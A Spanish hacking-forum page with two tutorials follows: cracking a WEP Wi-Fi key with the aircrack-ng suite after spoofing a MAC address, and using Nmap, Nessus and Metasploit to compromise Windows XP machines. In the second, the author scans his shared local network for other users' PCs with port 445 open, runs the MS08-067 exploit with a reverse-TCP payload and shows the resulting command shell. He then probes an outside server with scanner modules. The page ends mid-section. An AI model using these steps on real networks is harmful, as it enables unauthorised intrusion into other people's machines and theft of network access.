Bueno en este tutorial, hare una Auditoria Wireless desde una máquina virtual (S.O) Wifislax 3.1), ya que es comodo para user de Windows que podran hacer esto sin tener que arrancar el tipico CD-Live de Wifislax, BT4, Wifiway, etc (De esta forma, solo bastaria con hacerlo una vez); pues ya que podran continuar trabajando en Windows sin necesidad de estar expresamente en algun S.O previamente citado, me refiero a Windows porque “en Linux” basta con instalar la suite de Aircrack-ng, si es que no se encuentra preinstalada en la distro.

Lo voy hacer con el software VMWARE Workstation, para aquel que desconozca su funcionamiento le dejo aquí un un tuto de mi bro XD. aetsu:

Tutorial VMWARE Workstation:
Código: You are not allowed to view links. Register or Login
http://206.51.232.10/~h4x0r/foro/index.php?topic=2533.0

O este, donde se emula wifislax con el mismo, en Windows:

Emulación de Wifislax 3.1
Código: You are not allowed to view links. Register or Login
http://206.51.232.10/~h4x0r/foro/index.php?topic=1029.0

Nota: Si tienen problemas para activar su interfaz en VMware, se dirijen a la barra de herramientas de Vmware>VM>Removable>Devices>Buscan la interfaz>Connect.(Hay mas formas de hacerlo, pero no importa):

Para instalar la Suite de aircrack en Ubuntu 9.10:

Código: You are not allowed to view links. Register or Login
sudo apt-get install aircrack-ng

Para instalar Macchanger en Ubuntu 9.10:

Código: You are not allowed to view links. Register or Login
sudo apt-get install macchanger
Bien pues comencemos, una vez instalado el software y S.O en este y en Ubuntu dichos softwares, comenzamos con Wifislax 3.1/Ubuntu 9.10:

Paso Nº1: Comprobamos el nombre que recibe la interfaz de red a utilizar, ya que es importante, para posteriormente adaptarlo en los campos que la necesitemos, para ello, abrimos una shell, y lanzamos el comando:

Código: You are not allowed to view links. Register or Login
ifconfig

Nota: Fijensen en los datos y sobre todo en el nombre correspondiente a esta.

Paso Nº2: Ahora deberemmos detener la interfaz de red a utilizar; lanzando el comando:

Código: You are not allowed to view links. Register or Login
ifconfig [Nombre de la interfaz] down

En mi caso:

Código: You are not allowed to view links. Register or Login
ifconfig wlan0
Paso Nº3: Cambiaremos la dirección MAC de la interfaz de red a utilizar, para que pase de desapercibida la dirección MAC real de esta en la red o logS del router, para ello (En Wifislax 3.1):

Opción Nº1:

Menú principal>wifislax>herramientas wireless>macchanger

*Y escriben cualquier MAC, por ejemplo:

Código: You are not allowed to view links. Register or Login
00:11:22:33:44:55

Opción Nº2: O si adoran la shell (Para Ubuntu 9.10):

Código: You are not allowed to view links. Register or Login
macchanger --mac 00:11:22:33:44:55 [Nombre de la interfaz]

You are not allowed to view links. Register or Login

Opción Nº3: O una MAC asignada de manera aleatroria:

Código: You are not allowed to view links. Register or Login
macchanger -A [Nombre de la interfaz]


Paso Nº4: Pasamos a poner la interfaz de red en modo monitor o “modo escucha”:

Código: You are not allowed to view links. Register or Login
airmon-ng start [Nombre de la interfaz]

You are not allowed to view links. Register or Login

Nota: Como pueden observar, la interfaz de red, recibió un nuevo nombre [mon0], el cual debemos tener en cuenta para posteriormente incluirlo en las sintaxis nombradas posteriormente.

Paso Nº5: Con el siguiente comando realizamos un scan de las redes que posteriormente nos centraremos en una de ellas,Para ello, abrimos una shell, y escribimos la siguiente sintaxis:

Código: You are not allowed to view links. Register or Login
airodump-ng mon0

Y a continuación se muestra:

You are not allowed to view links. Register or Login

Campos que podemos observar:

Código: You are not allowed to view links. Register or Login
dirección MAC (Bssid)
canal del AP (ch)
nombre AP(Essid)
Datos no validos (Beacons)
Velocidad de inyección (#/S)
Datos validos (Data)
ENC-CIPHER-AUTH (Encriptación)
Velocidad y estándar de la red(MB)

Paso Nº6: Es la hora de selecionar una víctima (AP), los parámetros a tener en cuenta son su dirección MAC y el canal de este, abrimos una shell, y escribimos la siguiente sintaxis:

Código: You are not allowed to view links. Register or Login
airodump-ng -w [Nombre del archivo de captura] --bssid [Dirección MAC del AP] -c[canal del AP victima] [Nombre de la interfaz (mon0)].

*Vean como quedaría:

You are not allowed to view links. Register or Login

Nota: Los resultados en la carpeta root (Principal de Home) cuyo nombre de captura es sad-1.
Nota: Esta ventana no la cerramos la dejamos tal cual.

Paso Nº7: Para asociarnos con el AP víctima, abrimos una Shell, y escribimos la siguiente sintaxis:

Código: You are not allowed to view links. Register or Login
aireplay-ng -1 15 –e [Nombre AP] –a [MAC AP] –h [MAC NUESTRA] [Nombre de la interfaz (mon0)]

Nota: El valor 15 es importante y depende a la hora de la asociación con la víctima (AP), este incluye un rango desde 0 a 30.
Nota: Con este comando creamos una asociación entre el router y la PC. Debemos intentar una y otra vez hasta que nos aparezca:

Código: You are not allowed to view links. Register or Login
“association sucefull :-)”

Nota: Hasta entonces, no estaremos asociados.


Ataque 1 + 3



Paso Nº8: Abrimos una shell, y escribimos la siguiente sintaxis:

Código: You are not allowed to view links. Register or Login
aireplay-ng -3 –b [MAC AP] –h [MACNUESTRA] [Nombre de la interfaz]

You are not allowed to view links. Register or Login

Nota: Con esto comienza el proceso de leer y enviar paquetes (#data$).


Aircrack-ng


Paso Nº9: Para finalizar, lanzamos el Aircrack, para obtener la Pass en claro. Abrimos una "shell", y escribimos la siguiente sintaxis:

Código: You are not allowed to view links. Register or Login
aircrack-ng [Nombre del archivo de captura]

*En mi caso:

Código: You are not allowed to view links. Register or Login
aircrack-ng sad-1.cap

o

aircrack-ptw sad-1.cap



Un salu2.





18
Bugs y Exploits / [Tutorial] Conociendo Metasploit Framework
« en: Abril 15, 2010, 02:56:58 am »
Metasploit Framework, Nmap & Nessus
By Rcart
CPH

Se les saluda a cada uno de ustedes. Como lo mencione en un post, desarrollaría este tutorial de Metasploit Framework y tambien incluiré Nmap y Nessus (en una simple vista). Espero sea de su agrado y el propósito de este es únicamente de aprendizaje.

Nota: Este tutorial esta hecho bajo la distribución Ubuntu 9.04, ya que en ningún momento voy a hacer uso del entorno gráfico de MSF por los momentos y todo se realizara desde la interfaz de consola: msfconsole. Se recomienda su utilización.


Antes de continuar, quisiera que montaran su "Hack Lab" para hacer las pruebas de forma local. Lees recomiendo este tutorial:
  • You are not allowed to view links. Register or Login (By trashhgoo)

Índice

  • Introducción a MSF
  • Instalación de MSF
  • Introducción a Nmap*
  • Instalación de Nmap
  • Introducción a Nessus*
  • Instalación de Nessus
  • Buscando objetivos con Nmap
  • Ecaneando objetivos con Nessus
  • Mi primera Intrusión con MSF
  • Conociendo los modulos auxiliares (Auxiliary)
  • Conociendo Meterpreter

*Se darán únicamente definiciones.


Aportes de Shell Root (Enlace Directo)


Aportes de trashhgoo (Enlace Directo)


Introducción

Que es Metasploit Framework (MSF) ?

Según la Wikipedia: Es una herramienta para desarrollar y ejecutar exploits contra una máquina remota. Inicialmente fue creado utilizando el lenguaje de programación de scripting Perl, aunque actualmente el Metasploit Framework ha sido escrito de nuevo completamente en el lenguaje Ruby. (resumen)

Cuando debo utilizar MSF?


Como bien se ha dicho es una herramienta para ejecutar exploits, hechos por nosotros o bajados y compilados, y su utilización se realizara cuando encontremos equipos vulnerables a alguno de los exploits presentes en MSF.

Instalación

Primero que nada debemos ir al sitio oficial: You are not allowed to view links. Register or Login para luego en la sección de Quick Links descargar la versión según nuestro SO, en mi caso descargo el archivo para UNIX.

Nota: El siguiente paso no es necesario en las versiones posteriores a la 3.3 de MSF ya que su instalacion varia .

Debido a que Ubuntu no trae por defecto el interprete de Ruby necesitamos instalarlo, ademas de una libreria para soporte SSL ya que sin ella, no nos funcionarían algunos de nuestros exploits:
Código: You are not allowed to view links. Register or Login
sudo apt-get install ruby1.8 libopenssl-ruby1.8 rails
Una vez descargado el MSF desde su sitio oficial,  lo posicionamos en nuestro directorio personal (/home/tu-usuario/), luego lo descomprimimos con click derecho> extraer aquí. Pero si son unos adictos a la terminal, lo descomprimimos así:
Código: You are not allowed to view links. Register or Login
tar -xvvf framework-3.2.tar.gz
Eso nos creara un directorio llamado framework-3.2, al cual accederemos desde la terminal para invocar la consola de MSF:
Código: You are not allowed to view links. Register or Login
cd framework-3.2
./msfconsole

Lo que nos devolverá una linda imagen (aunque seguramente sera distinta):
si te gusta mi wallpaper te lo mando por MP xD

Y a partir de este momento estamos listos para poder comenzar a teclear nuestros comandos para poder llegar a lograr nuestro objetivo: la explotación de vulnerabilidades con MSF.

Introducción a Nmap

Que es Nmap?
Según de la Wikipedia: Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

En nuestra practica, Nmap nos servira para poder escanear los equipos a los cuales queramos enfocarnos, viendo sus servicios, puertos abiertos, SO, y demas cosas que veremos posteriormente.

Instalación

Nmap se encuentra en casi todos los repositorios de la mayoria de las distribuciones Gnu/Linux. En nuestro caso, hacemos uso del gestor de paquetes apt.
Código: You are not allowed to view links. Register or Login
sudo apt-get install nmap
Con eso, estaría instalado perfectamente Nmap en su versión 4.x. Lastimosamente en este tuto no pienso enfocarme en el uso de Nmap, seria bueno que buscaran algunos tutos en Google para no estar preguntando para que sirve cada opción pero si aun así no las entienden, con gusto se las explicaría =)
Introducción a Nessus
No es necesaria si van a utilizar otro scanner

Que es Nessus?
Según de la Wikipedia: Nessus es un programa de escaneo de vulnerabilidades en diversos sistemas operativos. Consiste en nessusd, el daemon Nessus, que realiza el escaneo en el sistema objetivo, y nessus, el cliente (basado en consola o gráfico) que muestra el avance y reporte de los escaneos

Podrían perfectamente utilizar cualquier otro scanner de vulnerabilidades como ser SSS o Acunetix.

Instalación de Nessus

Ingresamos a You are not allowed to view links. Register or Login. Luego seleccionamos Nessus 4.0.2 for Linux y damos click en download. Aceptamos los terminos de licencia y luego descargamos el archivo correspondiente a nuestra distro, en mi caso elijo el archivo Ubuntu 8.10 and 9.04 (32 bits) (Nessus-4.0.2-ubuntu810_i386.deb).

Una vez haya finalizado la descarga, lo guardamos en nuestro directorio personal (/home/tu-usuario/) y lo instalamos con el gestor de paquetes de Ubuntu haciendo doble click, sino, desde la terminal:
Código: You are not allowed to view links. Register or Login
sudo dpkg -i Nessus-4.0.2-ubuntu810_i386.deb
Luego nos tenemos que registrar para poder activar el demonio de Nessus (nessusd). Para ello vamos a You are not allowed to view links. Register or Login y aceptamos la licencia. Ingresamos nuestra dirección de correo al cual sera enviado el código de activación. Luego agregamos un usuario que sera el “administrador” de Nessus.

Ejecutamos desde una terminal:
Citar
sudo /opt/nessus/sbin/nessus-adduser
Login : usuario-para-nessus
Authentication (pass/cert) : [pass] presionas_enter
Login password : escribis-la-pass
Login password (again) : volves-a-escribir-la-pass
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set) presionas enter

Login : el-usuario-que-ingresaste
Password : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
Luego ingresamos el código de activación:
Código: You are not allowed to view links. Register or Login
sudo /opt/nessus/bin/nessus-fetch --register la-clave-que-te-enviaron-a-tu-correo
Listo, con eso deberia de aparecerles un mensaje en el que se indica que Nessus esta actualizando sus plugins. Para mas información deberían de consultar Google xD

Por ultimo, instalamos el cliente de Nessus, el que nos permitira interactuar con el demonio de Nessus graficamente:

Ingresamos a  You are not allowed to view links. Register or Login y selecciona  NessusClient 4.0.2 (The Linux graphical interface for nessud) y le das en download. Aceptas la licencia y luego seleccionas el archivo correspondiente a tu distribución, en mi caso NessusClient-4.0.2-ubuntu810_i386.deb (Ubuntu 8.10 and 9.04 (32 bits).

Cuando la descarga termine, lo guardas en tu directorio personal (/home/tu-usuario/), junto al anterior, y luego lo instalas con el gestor de paquetes de Ubuntu haciendo doble click o desde la terminal:
Código: You are not allowed to view links. Register or Login
sudo dpkg -i NessusClient-4.0.2-ubuntu810_i386.deb
Por ultimo reiniciamos el deamon de Nessus (nessusd):
Código: You are not allowed to view links. Register or Login
sudo /etc/init.d/nessusd restart
Y listo!, p u t o nessus, ya lo podremos encontrar en el menu Aplicaciones>Internet.

Si en algun caso nos muestra algun tipo de error relacionado a que no se puede iniciar el deamon, verifiquemos los paso anteriores.

Hasta este punto, tenemos instados el servidor y el cliente Nessus, solo nos hace falta establecer la comunicación entre ambas partes.

Para hacerlo, abrimos el cliente gráfico desde el menú Aplicaciones>Internet, despues continuamos con los pasos explicados a continuacion:

1.- Botón para establecer la conexión

2.- Botón para agregar la conexión. En este paso nos parecerá la venta “Edit conexion”.

Aquí tendrán que establecer los datos que aparecen en la imagen. Los mas importantes son el host y el port, tienen que ser iguales al los de la imagen (si es que no se ha modificado el archivo de configuración),

3.-  Escriben el nombre y pass del usuario que agregaron como “administrador” y luego le dan en Save. Luego la seleccionan y le dan en Connect. Les aparecerá un mensaje informando que es la primera conexión y le dan en Ok.


Para saber su funcionamiento deberán de buscar información sobre el mismo. Lo que hice fue únicamente mostrar su Instalación, ya que es considerada una de las partes mas “complicadas” (para sus ultimas versiones).

Buscando objetivos con Nmap

Una vez hayamos instalado las aplicaciones correspondientes, manos a la obra.

Primero que nada, vamos a escanear nuestra red para tener un objetivo cerca :D. Recuerden que esos “objetivos” son usuarios normales y no mantienen todo el día sus PC's encendidas y por lo general son equipos vulnerables, debemos ser rápidos ya que quizás durante el proceso de explotación, estos equipos se desconecten y nosotros estemos esperando una shell. LOL

Debo aclarar que la búsqueda de objetivos es especifica: encontrar equipos con el puerto 445 abierto. Por que? Porque es ese servicio el que buscamos explotar por esta primer intrusion.

En mi caso, tengo como objetivo un equipo de mi red con ip 10.21.37.179. Para hacer un scann eficiente y sencillo  lo hacemos de la siguiente manera y como root:
Código: You are not allowed to view links. Register or Login
nmap -v -sV 10.21.37.179
Con lo cual obtendremos un resultado similar a este:
Código: You are not allowed to view links. Register or Login
rcart@rcart:~$ nmap -v -sV 10.21.37.179
Discovered open port 3389/tcp on 10.21.37.179
Discovered open port 139/tcp on 10.21.37.179
Discovered open port 445/tcp on 10.21.37.179

Host 10.21.37.179 appears to be up ... good.
Interesting ports on 10.21.37.179:

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
2869/tcp closed unknown
3389/tcp open   microsoft-rdp Microsoft Terminal Service
Service Info: OS: Windows

Host script results:
|  Discover OS Version over NetBIOS and SMB: Windows XP
|_ Discover system time over SMB: 2009-10-06 17:06:50 UTC+2

Esta un poco resumido, pero no va a variar mucho. Explico las opciones:
-v = verbose
-sV = Con esto obtenemos la versión del servicio que esta corriendo bajo un puerto determinado.

Con estos resultados estariamos listos para interactuar con Mestasploit. Pero primero debemos de analizar ese equipo en busca de vulnerabilidades con Nessus.

Si no saben ni por que objetivo comenzar, pueden hacer un “barrido” de red para saber que equipos “cercanos” a ustedes estan vivos. Lo hacemos asi:
Código: You are not allowed to view links. Register or Login
nmap -sP 10.21.37.*
Y con eso obtendriamos un resultado similar a este:
Código: You are not allowed to view links. Register or Login
root@rcart:/home/rcart/pentest/scanns# nmap -sP 10.21.37.*

Starting Nmap 4.76 ( http://nmap.org ) at 2009-10-06 20:57 CST
Host 10.21.37.1 appears to be up.
MAC Address: 00:06:5B:DB:8B:8D (Dell Computer)
Host 10.21.37.2 appears to be up.
MAC Address: 00:E0:4D:72:35:73 (Internet Initiative Japan)
Host 10.21.37.3 appears to be up.
MAC Address: 00:0D:87:B2:B4:DD (Elitegroup Computer System Co. (ECS))
Host 10.21.37.72 appears to be up.
MAC Address: 00:E0:4C:A0:0A:F2 (Realtek Semiconductor)
Host 10.21.37.215 appears to be up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.43 seconds
root@rcart:/home/rcart/pentest/scanns#

Y como vemos, hay varios equipos que “appears to be up” (esta vivos) y pues ya tendríamos objetivos para poder buscar el puerto 445 abierto con el procedimiento de escaneo anterior.

Existen formas mas complejas pero eficientes de hacer scanns con Nmap, como por ejemplo escanear todos los equipos de nuestra red especificando el puerto 445 y otra variedad de alternativas.

NOTA: Las IP's usadas son de la red a la que pertenezco, ustedes deben utilizar las de su red o la que quieran.

Escaneando objetivos con Nessus

Esta etapa de buscar vulnerabilidades con Nessus no es tan dificil, ya los tenemos configurado y listo para funcionar. Solo hace falta crear una “política de scann” pero como Nessus es bastante intuitivo no creo que ese sea problema :P

Entonces, lo único que tenemos que hacer es agregar el objetivo escaneado con Nmap y que tiene el puerto 445 abierto. Luego le damos al Botón “Scan Now” y si todo ha salido bien, nos deberia de apararecer una imagen similar a esta:
Modifique un poco mi escritorio. Hermoso eh?

Como vemos, el servicio que nos mostro Nmap en el puerto 445/tcp “Microsoft Windows XP microsoft-ds” aparece completamente vulnerable. Hasta este punto estamos listos para “jugar” con esta maravillosa herramienta: Metasploit Framework.


Mi primera Intrusión con MSF

Despues de tanto, hemos podido encontrar un equipo con la vulnerabilidad que buscábamos y ha llegado el momento de proceder con la explotación.

Primero que nada conozcamos como esta dividido MSF (Metasploit Framework):
  • Exploits: aquí encontramos todos los exploits disponibles en MSF y que podemos utilizar. Estan dividos por SO's y categoriras. Ejemplo: exploits/windows/browser/ y aquí econtrariamos los exploits disponibles para los navegadores que corren en el SO windows.
  • Payloads: esta es una de las cosas mas importantes, es la accion que se va a realizar si se logra explotar la vulnerabilidad que selecccionamos. Ejemplo: windows/shell/reverse_tcp y con esto obtendriamos una shell inversa.
  • Auxiliary: son scripts con diferentes funciones. Ejemplo: auxiliary/scanner/portscan/tcp y utilizando este scanner de puertos tcp, obtendriamos el estado de puertos y el servicio que esta corriendo bajo estos mismo. Muy util si no te gusta Nmap xD
  • Enconders: son algoritmos de codificación para cuando hagamos ingeniería social y tengamos que evadir algunos antivirus. Muy importante conocerlo.
Con eso bastaria conocer por los momentos, el unico que falta son los NOP Generators, no los menciono porque todavia no los comprende como es debido.

Ahora veamos los comandos que necesitaremos utilizar para poder desplazarnos por MSF:

  • help: Nos muestra los comandos disponibles actualmente.
  • show: Nos muestra todo el contenido de cada categoria: exploits, payloads, auxiliary encoders, NOP Generators. Aunque tambien podemos especificar una categoria. Ejemplo: show exploits.
  • search: Busca cualquier objeto mediante una palabra clave. Ejemplo: search ftp
  • info: Proporciona información sobre un exploit,payload, auxiliary, etc. Es muy importante ya que con este comando tambien podemos conocer la descripcion, referencias y equipos en los que se puede utilizar  el objeto al que estamos invocando Ejemplo: info windows/ftp/proftp_banner
  • use: Con este comando, establemos el objeto con el que vamos a trabajar; sea exploit o auxiliary que son con los que vamos a trabajar nosotros. Ejemplo: use exploits/windows/
  • show options: Importantisimo. Si no conocemos como funciona algun exploit o auxiliary este comando nos ayudara muchisimo, aunque por lo general no requieren de muchos parametros. Se ejecuta despues que hayamos seleccionado el objeto: exploit, auxiliary o payload(unicamente si ya se ha seleccionado un exploit)
  • set: Con este comando, establecemos los parametros necesarios de algun exploit o auxiliary. Los parametros dependen del objeto que hayamos seleccionado anteriormente. Por mecionar algun ejemplo:
    set RHOST xxx.xxx.xxx.xxx, set RPORT 445, set LHOST xxx.xxx.xxx.xxx, set LPORT 2525. Son solo ejemplos.
  • set PAYLOAD: Este comando lo pongo aparte porque es importante conocerlo bien. Como mencione anteriormente los payloads es la accion que se realiza cuando un exploit ha explotado una vulnerabilidad correctamente. Lo utilizamos despues de haber seleccionado un exploit únicamente. Comunmente necesitamos establecer los parametros LHOST y LPORT.
  • back: Con esto volveriamos a comenzar desde 0.

Ademas de esos comandos hay muchos otros que poco a poco los iremos viendo cada vez que sea necesario. Tambien debo aclarar que cuando entramos a la interfaz de consola (msfconsole) de MSF tambien podemos hacer uso de los comandos de nuestro SO Gnu/Linux como si estuviéramos en una consola normal.

Les recomiendo que antes de comenzar con la explotación naveguen un poco en MSF utilizando los comandos basicos que mencione anteriormente y cualquier cosa que vean interesante, para que se vallan familiarizando y asi se haga mas facil la practica.

Que exploit utilizaremos para la vulnerabilidad que nos mostró Nessus?
msf08_067_netapi.

Usen el comando info para ver los equipos que son vulnerables a este exploit y sus opciones ademas de otras cosas.

Ingresemos a la interfaz de consola de MSF para comenzar :D
Seleccionamos el exploit que vamos a utilizar:
Código: You are not allowed to view links. Register or Login
msf > use exploit/windows/smb/ms08_067_netapi
Verificamos las opciones del exploit para ver cuales estan disponibles y cuales son necesarias para luego ingresarlas:
Código: You are not allowed to view links. Register or Login
msf exploit(ms08_067_netapi) > show options
Module options:

   Name     Current Setting  Required  Description
   ----          ---------------       --------  -----------
   RHOST                           yes       The target address
   RPORT    445                 yes       Set the SMB service port
   SMBPIPE  BROWSER  yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 10.21.37.179
RHOST => 10.21.37.179
msf exploit(ms08_067_netapi) >

Nota: las opciones que tienen “yes” en la columna “Required” significa que son obligatorias. Algunas se llenan automáticamente, otras hay que ingresarlas manualmente. Luego de ingresar el parametro set RHOST deberían de ver de nuevo las opciones para que vean como se llenan las opciones requeridas.

Ahora seleccionamos el PAYLOAD que vemos a utilizar. En esta ocacion comenzaremos con una simple shell, mas adelante utilizaremos otros.
Código: You are not allowed to view links. Register or Login
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.21.37.179     yes       The target address
   RPORT    445                    yes       Set the SMB service port
   SMBPIPE  BROWSER     yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                             yes       The local address
   LPORT     4444                yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set LHOST 10.21.17.215
LHOST => 10.21.17.215
msf exploit(ms08_067_netapi) >

Como veran hemos ingresado los parametros requeridos tanto del exploit como del payload. Ahora solo nos falta verificar (show options) que todo este como queremos para luego ejecutar un comando que no he mencionado, pero es el mas esperado.
Código: You are not allowed to view links. Register or Login
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (10.21.17.215:4444 -> 10.21.37.179:1035)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Wow! Al fin nuestra primera intrusión con MSF! Si no saben que hacer con la shell que acabamos de obtener, les recomendaria que mejor se vallan a ver la televisión LOL.




Conociendo los Modulos Auxiliares (Auxiliary)


Uno de los primeros pasos que se deben tomar para lograr una intrusion, es la recoleccion de informacion. Saber que SO y/o version estamos analizando, que puertos estan abiertos, que servicios, etc. Metasploit contiene una buena cantidad de modulos auxiliares que nos permiten obtener cierta informacion de nuestro objetivo. Se diferencian de los exploits por ser utilizados para la obtencion de informacion, es decir, con los modulos auxiliares no obtendremos ninguna shell, sin embargo nos serviran para llegar a lograrlo. Para ejecutar un modulo auxiliar, ingresamos el comando run.

Sintaxis para el uso de modulos auxiliares: Esta es muy simple y igual que los exploits, dependen del modulo que     estemos utilizando. Los parametros basicos son: RHOSTS, RPORT y THREADS donde:
    RHOST: es el objetivo y puede contener ragos, clases de redes, o varios hosts separados por comas
    RPORT: es el  puerto del servicio, el especificado por defecto no se cambia comunmente.
    THREADS: Numero de hilos concurrentes, se cambian dependiente del numero de host que vamos a analizar.

Recordemos utilizar el comando info para conocer el modulo auxiliar y sus opciones.

En esta seccion, veremos los siguiente modulos auxiliares de tipo scanners:
  • scanner/ssh/ssh_version
  • scanner/portscan/tcp
  • scanner/http/writable
  • scanner/http/options
  • scanner/http/wmap_files_dir
  • scanner/ftp/anonymous
  • scanner/smb/version


scanner/ssh/ssh_version: Este scanner, como su nombre lo dice, nos permite identificar la version del servidor ssh en un objetivo especifico. Veamos un ejemplo:

Seleccionamos el modulo auxiliar:

Código: You are not allowed to view links. Register or Login
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) >

Luego observamos sus opciones y asignamos valores dependiendo de las que requiera:

Código: You are not allowed to view links. Register or Login
msf auxiliary(ssh_version) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(ssh_version) >

Como vemos, este modulo auxiliar contiene las opciones basicas, y como ya las conocemos las asignamos sin ningun problema para luego ejecutarlo con el comando run

Código: You are not allowed to view links. Register or Login
msf auxiliary(ssh_version) > set RHOSTS 10.21.0.1
RHOSTS => 10.21.0.1
msf auxiliary(ssh_version) > run

[*] 10.21.0.1:22, SSH server version: SSH-1.5-Cisco-1.25
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) >

Como vemos, la version del servidor ssh es 1.5 y pertenece a un router Cisco, que es el router de mi ISP xD


scanner/portscan/tcp: Este modulo es un scanner de puertos TCP. Nos proporciona muy buenos resultados sobre los puertos abiertos en un objetivo especifico. Veamos:

Código: You are not allowed to view links. Register or Login
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PORTS    1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                    yes       The target address range or CIDR identifier
   THREADS  1                yes       The number of concurrent threads
   TIMEOUT  1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) >

Las opciones son casi las mismas, no es necesario explicarlas. Veamos que resultados nos muestra:

Código: You are not allowed to view links. Register or Login
msf auxiliary(tcp) > set RHOSTS 190.5.x.x
RHOSTS => 190.5.x.x
rmsf auxiliary(tcp) > run

[*]  TCP OPEN 190.5.x.x:21
[*]  TCP OPEN 190.5.x.x:80
[*]  TCP OPEN 190.5.x.x:110
[*]  TCP OPEN 190.5.x.x:111
[*]  TCP OPEN 190.5.x.x:143
[*]  TCP OPEN 190.5.x.x:443
[*]  TCP OPEN 190.5.x.x:631
[*]  TCP OPEN 190.5.x.x:954
[*]  TCP OPEN 190.5.x.x:993
[*]  TCP OPEN 190.5.x.x:995
[*]  TCP OPEN 190.5.x.x:3128
[*]  TCP OPEN 190.5.x.x:3306
[*]  TCP OPEN 190.5.x.x:5432
[*]  TCP OPEN 190.5.x.x:10000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Como vemos, obtenemos un excelente resultado de los puertos abiertos en el servidor 190.5.x.x. Este modolo auxiliar  nos serviria de mucho si no contamos con un scanner de puertos.


scanner/http/writeble: Este scanner comprueba si estan permitidos los metodos  PUT/DELETE en un servidor web y si esta permitido, seria un error devastador. Actualmente es muy dificil (por no decir imposible) de encontrar, pero es bueno conocerlo. Se ejecuta asi:

Código: You are not allowed to view links. Register or Login
msf > use auxiliary/scanner/http/writable
msf auxiliary(writable) > set RHOST xxxxx.net
RHOST => xxxxx.net
msf auxiliary(writable) > run

[*] Upload failed on http://190.5.x.x:80 [405 Method Not Allowed]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(writable) >

Despues de ejecutar el modulo, nos muestra que los metodos PUT/DELETE no estan permitidos:"Upload failed on You are not allowed to view links. Register or Login [405 Method Not Allowed]”


scanner/http/options: Con el modulo anterior ya vimos que no estan permitidas las opciones PUT/DELENTE. Ahora veremos como obtener las opciones habilitadas en un servidor web. Dependiendo de las opciones habilitadas tendremos alternativas para continuar con otros metodos externos a MSF. Veamos:

Código: You are not allowed to view links. Register or Login
msf auxiliary(anonymous) > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS xxxxx.net
RHOSTS => xxxxxx.net
msf auxiliary(options) > run

[*] 190.5.x.x allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(options) >

El resultado es simple y claro. Ademas esta un poco interensante xD


scanner/http/wmap_files_dir: Este modulo, nos muestra la estructura de directorios del servidor web especificado. Ejemplifiquemos:

Código: You are not allowed to view links. Register or Login
msf auxiliary(wmap_dir_listing) > use auxiliary/scanner/http/wmap_files_dir
msf auxiliary(wmap_files_dir) > set RHOSTS xxxxx.hn
msf auxiliary(wmap_files_dir) > run

[*] Using code '404' as not found.
[*] Found http://190.5.92.20:80/admin 301
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wmap_files_dir) >

En este resultado muestra unicamente el directorio “admin” debido a mi conexion (es una mierda) pero a ustedes deberia mostrar una buena lista de directorios.


scanner/ftp/anonymous: Con este modulo auxiliar, podriamos verificar si esta permitido el usuario anonimo en un servidor ftp. En esta prueba, instale un servidor ftp (vsftpd) en mi PC para comprobar la funcionalidad de este modulo auxiliar. El servidor ftp lo configure permitiendo el acceso a usuarios anonimos. Veamos:

Código: You are not allowed to view links. Register or Login
msf auxiliary(writable) > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > run

[*] 127.0.0.1:21 Anonymous READ (220 (vsFTPd 2.0.7))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >

Como vemos, el resultado es el esperado. Nos muestra que el usuarios esta permitido: “Anonymous READ”. Pero si quisieran saber que resultado muestra cuando no esta permitido el usuario anonimo, con gusto lo demuestro:

Código: You are not allowed to view links. Register or Login
